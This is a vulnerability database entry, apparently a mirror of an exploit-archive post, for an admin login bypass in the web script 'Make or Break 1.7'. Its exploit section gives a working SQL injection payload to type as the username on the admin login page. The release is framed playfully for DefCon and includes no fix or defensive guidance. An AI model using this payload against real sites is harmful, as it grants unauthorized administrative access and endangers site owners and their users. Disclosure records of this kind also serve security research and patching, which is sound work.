Friends in War Make or Break 1.7 - Authentication Bypass

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1036982 漏洞类型
发布时间 2017-07-27 更新时间 2017-07-27
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2017070175
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
[x] Type: Admin login bypass via SQLi
 
[x] Vendor: http://software.friendsinwar.com/
 
[x] Script Name: Make or Break
 
[x] Script Version: 1.7
 
[x] Script DL: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
 
[x] Author: Anarchy Angel
 
[x] Mail: anarchy[dot]ang31@gmail[dot]com
 
[x] More info: https://aahideaway.blogspot.com/
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
Navigate to scripts admin login page and submit admin' or ''='-- for username
 
and it should give you access to the admin area. A quick release to
kick off DefCon festivities. See you there! Enjoy >:)